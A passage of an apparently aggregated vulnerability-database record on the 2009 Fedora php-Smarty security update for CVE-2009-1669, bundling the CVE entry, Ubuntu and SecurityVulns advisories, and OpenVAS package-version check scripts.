ID FEDORA:8E04C10F880 Type fedora Reporter Fedora Modified 2009-05-27T19:08:31
Description
Although Smarty is known as a "Template Engine", it would be more accurately described as a "Template/Presentation Framework." That is, it provides the programmer and template designer with a wealth of tools to automate tasks commonly dealt with at the presentation layer of an application. I stress t he word Framework because Smarty is not a simple tag-replacing template engine. Although it can be used for such a simple purpose, its focus is on quick and painless development and deployment of your application, while maintaining high-performance, scalability, security and future growth.
{"id": "FEDORA:8E04C10F880", "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 11 Update: php-Smarty-2.6.25-1.fc11", "description": "Although Smarty is known as a \"Template Engine\", it would be more accurately described as a \"Template/Presentation Framework.\" That is, it provides the programmer and template designer with a wealth of tools to automate tasks commonly dealt with at the presentation layer of an application. I stress t he word Framework because Smarty is not a simple tag-replacing template engine. Although it can be used for such a simple purpose, its focus is on quick and painless development and deployment of your application, while maintaining high-performance, scalability, security and future growth. ", "published": "2009-05-27T19:08:31", "modified": "2009-05-27T19:08:31", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2009-1669"], "lastseen": "2020-12-21T08:17:49", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1669"]}, {"type": "ubuntu", "idList": ["USN-791-3", "USN-791-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22076", "SECURITYVULNS:VULN:10012"]}, {"type": "nessus", "idList": ["UBUNTU_USN-791-1.NASL", "UBUNTU_USN-791-3.NASL", "FEDORA_2009-5525.NASL", "FEDORA_2009-5516.NASL", "DEBIAN_DSA-1919.NASL", "GENTOO_GLSA-201006-13.NASL", "FEDORA_2009-5520.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231067847", "OPENVAS:64322", "OPENVAS:136141256231064079", "OPENVAS:64080", "OPENVAS:64079", "OPENVAS:136141256231066103", "OPENVAS:136141256231064080", "OPENVAS:66103", "OPENVAS:64078", "OPENVAS:136141256231064078"]}, {"type": "fedora", "idList": ["FEDORA:8A68710F895", "FEDORA:6E6DC10F895"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1919-2:73FE7", "DEBIAN:DSA-1919-1:C1894"]}, {"type": "exploitdb", "idList": ["EDB-ID:8659"]}, {"type": "gentoo", "idList": ["GLSA-201006-13"]}], "modified": "2020-12-21T08:17:49", "rev": 2}, "score": {"value": 5.1, "vector": "NONE", "modified": "2020-12-21T08:17:49", "rev": 2}, "vulnersScore": 5.1}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "11", "arch": "any", "packageName": "php-Smarty", "packageVersion": "2.6.25", "packageFilename": "UNKNOWN", "operator": "lt"}]}
{"cve": [{"lastseen": "2020-10-03T11:54:13", "description": "The smarty_function_math function in libs/plugins/function.math.php in Smarty 2.6.22 allows context-dependent attackers to execute arbitrary commands via shell metacharacters in the equation attribute of the math function. NOTE: some of these details are obtained from third party information.\nPer http://secunia.com/advisories/35072\r\n\"The vulnerability is confirmed in version 2.6.22 on Windows. Other versions may also be affected.\"", "edition": 3, "cvss3": {}, "published": "2009-05-18T18:30:00", "title": "CVE-2009-1669", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1669"], "modified": "2017-09-29T01:34:00", "cpe": ["cpe:/a:smarty:smarty:2.6.22"], "id": "CVE-2009-1669", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1669", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:smarty:smarty:2.6.22:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-09T01:33:51", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1669"], "description": "It was discovered that Smarty did not correctly filter certain math \ninputs. A remote attacker using Smarty via a web service could exploit \nthis to execute subsets of shell commands as the web server user.", "edition": 5, "modified": "2009-06-24T00:00:00", "published": "2009-06-24T00:00:00", "id": "USN-791-3", "href": "https://ubuntu.com/security/notices/USN-791-3", "title": "Smarty vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:37:41", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0501", "CVE-2008-4811", "CVE-2008-5432", "CVE-2008-5619", "CVE-2009-0502", "CVE-2008-4810", "CVE-2008-4796", "CVE-2008-6124", "CVE-2008-5153", "CVE-2009-0499", "CVE-2009-0500", "CVE-2009-1171", "CVE-2009-1669", "CVE-2007-3215"], "description": "Thor Larholm discovered that PHPMailer, as used by Moodle, did not \ncorrectly escape email addresses. A local attacker with direct access \nto the Moodle database could exploit this to execute arbitrary commands \nas the web server user. (CVE-2007-3215)\n\nNigel McNie discovered that fetching https URLs did not correctly escape \nshell meta-characters. An authenticated remote attacker could execute \narbitrary commands as the web server user, if curl was installed and \nconfigured. (CVE-2008-4796, MSA-09-0003)\n\nIt was discovered that Smarty (also included in Moodle), did not \ncorrectly filter certain inputs. An authenticated remote attacker could \nexploit this to execute arbitrary PHP commands as the web server user. \n(CVE-2008-4810, CVE-2008-4811, CVE-2009-1669)\n\nIt was discovered that the unused SpellChecker extension in Moodle did not \ncorrectly handle temporary files. If the tool had been locally modified, \nit could be made to overwrite arbitrary local files via symlinks. \n(CVE-2008-5153)\n\nMike Churchward discovered that Moodle did not correctly filter Wiki page \ntitles in certain areas. An authenticated remote attacker could exploit \nthis to cause cross-site scripting (XSS), which could be used to modify \nor steal confidential data of other users within the same web domain. \n(CVE-2008-5432, MSA-08-0022)\n\nIt was discovered that the HTML sanitizer, \"Login as\" feature, and logging \nin Moodle did not correctly handle certain inputs. An authenticated \nremote attacker could exploit this to generate XSS, which could be used \nto modify or steal confidential data of other users within the same \nweb domain. (CVE-2008-5619, CVE-2009-0500, CVE-2009-0502, MSA-08-0026, \nMSA-09-0004, MSA-09-0007)\n\nIt was discovered that the HotPot module in Moodle did not correctly \nfilter SQL inputs. An authenticated remote attacker could execute \narbitrary SQL commands as the moodle database user, leading to a loss \nof privacy or denial of service. (CVE-2008-6124, MSA-08-0010)\n\nKevin Madura discovered that the forum actions and messaging settings \nin Moodle were not protected from cross-site request forgery (CSRF). \nIf an authenticated user were tricked into visiting a malicious \nwebsite while logged into Moodle, a remote attacker could change the \nuser's configurations or forum content. (CVE-2009-0499, MSA-09-0008, \nMSA-08-0023)\n\nDaniel Cabezas discovered that Moodle would leak usernames from the \nCalendar Export tool. A remote attacker could gather a list of users, \nleading to a loss of privacy. (CVE-2009-0501, MSA-09-0006)\n\nChristian Eibl discovered that the TeX filter in Moodle allowed any \nfunction to be used. An authenticated remote attacker could post \na specially crafted TeX formula to execute arbitrary TeX functions, \npotentially reading any file accessible to the web server user, leading \nto a loss of privacy. (CVE-2009-1171, MSA-09-0009)\n\nJohannes Kuhn discovered that Moodle did not correctly validate user \npermissions when attempting to switch user accounts. An authenticated \nremote attacker could switch to any other Moodle user, leading to a loss \nof privacy. (MSA-08-0003)\n\nHanno Boeck discovered that unconfigured Moodle instances contained \nXSS vulnerabilities. An unauthenticated remote attacker could exploit \nthis to modify or steal confidential data of other users within the same \nweb domain. (MSA-08-0004)\n\nDebbie McDonald, Mauno Korpelainen, Howard Miller, and Juan Segarra \nMontesinos discovered that when users were deleted from Moodle, their \nprofiles and avatars were still visible. An authenticated remote attacker \ncould exploit this to store information in profiles even after they were \nremoved, leading to spam traffic. (MSA-08-0015, MSA-09-0001, MSA-09-0002)\n\nLars Vogdt discovered that Moodle did not correctly filter certain inputs. \nAn authenticated remote attacker could exploit this to generate XSS from \nwhich they could modify or steal confidential data of other users within \nthe same web domain. (MSA-08-0021)\n\nIt was discovered that Moodle did not correctly filter inputs for group \ncreation, mnet, essay question, HOST param, wiki param, and others. \nAn authenticated remote attacker could exploit this to generate XSS \nfrom which they could modify or steal confidential data of other users \nwithin the same web domain. (MDL-9288, MDL-11759, MDL-12079, MDL-12793, \nMDL-14806)\n\nIt was discovered that Moodle did not correctly filter SQL inputs when \nperforming a restore. An attacker authenticated as a Moodle administrator \ncould execute arbitrary SQL commands as the moodle database user, \nleading to a loss of privacy or denial of service. (MDL-11857)", "edition": 5, "modified": "2009-06-24T00:00:00", "published": "2009-06-24T00:00:00", "id": "USN-791-1", "href": "https://ubuntu.com/security/notices/USN-791-1", "title": "Moodle vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "cvelist": ["CVE-2009-1669"], "description": "===========================================================\r\nUbuntu Security Notice USN-791-3 June 24, 2009\r\nsmarty vulnerability\r\nCVE-2009-1669\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 9.04\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 9.04:\r\n smarty 2.6.22-1ubuntu1.1\r\n\r\nIn general, a standard system upgrade is sufficient to effect the\r\nnecessary changes.\r\n\r\nDetails follow:\r\n\r\nIt was discovered that Smarty did not correctly filter certain math\r\ninputs. A remote attacker using Smarty via a web service could exploit\r\nthis to execute subsets of shell commands as the web server user.\r\n\r\n\r\nUpdated packages for Ubuntu 9.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/smarty/smarty_2.6.22-1ubuntu1.1.diff.gz\r\n Size/MD5: 5384 cddf82ac12a8bf55573d7382cbbb3609\r\n http://security.ubuntu.com/ubuntu/pool/main/s/smarty/smarty_2.6.22-1ubuntu1.1.dsc\r\n Size/MD5: 1220 b96705a4b32e7e7e0965a71986f908b8\r\n http://security.ubuntu.com/ubuntu/pool/main/s/smarty/smarty_2.6.22.orig.tar.gz\r\n Size/MD5: 158529 a6e1d94453104c42374901da5139744c\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/smarty/smarty_2.6.22-1ubuntu1.1_all.deb\r\n Size/MD5: 204018 7ed9dc3ba0843ff6b2acf57f94ee31c3\r\n", "edition": 1, "modified": "2009-06-25T00:00:00", "published": "2009-06-25T00:00:00", "id": "SECURITYVULNS:DOC:22076", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22076", "title": "[USN-791-3] Smarty vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-1151", "CVE-2009-1150", "CVE-2009-1669"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2009-06-26T00:00:00", "published": "2009-06-26T00:00:00", "id": "SECURITYVULNS:VULN:10012", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10012", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1669"], "description": "Although Smarty is known as a \"Template Engine\", it would be more accurately described as a \"Template/Presentation Framework.\" That is, it provides the programmer and template designer with a wealth of tools to automate tasks commonly dealt with at the presentation layer of an application. I stress t he word Framework because Smarty is not a simple tag-replacing template engine. Although it can be used for such a simple purpose, its focus is on quick and painless development and deployment of your application, while maintaining high-performance, scalability, security and future growth. ", "modified": "2009-05-27T19:07:46", "published": "2009-05-27T19:07:46", "id": "FEDORA:8A68710F895", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: php-Smarty-2.6.25-1.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1669"], "description": "Although Smarty is known as a \"Template Engine\", it would be more accurately described as a \"Template/Presentation Framework.\" That is, it provides the programmer and template designer with a wealth of tools to automate tasks commonly dealt with at the presentation layer of an application. I stress t he word Framework because Smarty is not a simple tag-replacing template engine. Although it can be used for such a simple purpose, its focus is on quick and painless development and deployment of your application, while maintaining high-performance, scalability, security and future growth. ", "modified": "2009-05-27T19:06:20", "published": "2009-05-27T19:06:20", "id": "FEDORA:6E6DC10F895", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: php-Smarty-2.6.25-1.fc10", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-12-04T11:29:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to smarty\nannounced via advisory USN-791-3.", "modified": "2017-12-01T00:00:00", "published": "2009-06-30T00:00:00", "id": "OPENVAS:64322", "href": "http://plugins.openvas.org/nasl.php?oid=64322", "type": "openvas", "title": "Ubuntu USN-791-3 (smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_791_3.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_791_3.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-791-3 (smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 9.04:\n smarty 2.6.22-1ubuntu1.1\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-791-3\";\n\ntag_insight = \"It was discovered that Smarty did not correctly filter certain math\ninputs. A remote attacker using Smarty via a web service could exploit\nthis to execute subsets of shell commands as the web server user.\";\ntag_summary = \"The remote host is missing an update to smarty\nannounced via advisory USN-791-3.\";\n\n \n\n\nif(description)\n{\n script_id(64322);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-30 00:29:55 +0200 (Tue, 30 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-791-3 (smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-791-3/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"smarty\", ver:\"2.6.22-1ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5525.", "modified": "2018-04-06T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:136141256231064078", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064078", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-5525 (php-Smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5525.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5525 (php-Smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nCVE-2009-1669\n\nChangeLog:\n\n* Mon May 25 2009 Christopher Stone 2.6.25-1\n- Upstream sync\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update php-Smarty' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5525\";\ntag_summary = \"The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5525.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64078\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-5525 (php-Smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501564\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php-Smarty\", rpm:\"php-Smarty~2.6.25~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5520.", "modified": "2018-04-06T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:136141256231064080", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064080", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-5520 (php-Smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5520.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5520 (php-Smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nCVE-2009-1669\n\nChangeLog:\n\n* Mon May 25 2009 Christopher Stone 2.6.25-1\n- Upstream sync\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update php-Smarty' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5520\";\ntag_summary = \"The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5520.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64080\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-5520 (php-Smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501564\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php-Smarty\", rpm:\"php-Smarty~2.6.25~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5516.", "modified": "2017-07-10T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:64079", "href": "http://plugins.openvas.org/nasl.php?oid=64079", "type": "openvas", "title": "Fedora Core 9 FEDORA-2009-5516 (php-Smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5516.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5516 (php-Smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nCVE-2009-1669\n\nChangeLog:\n\n* Mon May 25 2009 Christopher Stone 2.6.25-1\n- Upstream sync\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update php-Smarty' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5516\";\ntag_summary = \"The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5516.\";\n\n\n\nif(description)\n{\n script_id(64079);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 9 FEDORA-2009-5516 (php-Smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501564\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php-Smarty\", rpm:\"php-Smarty~2.6.25~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5516.", "modified": "2018-04-06T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:136141256231064079", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064079", "type": "openvas", "title": "Fedora Core 9 FEDORA-2009-5516 (php-Smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5516.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5516 (php-Smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or 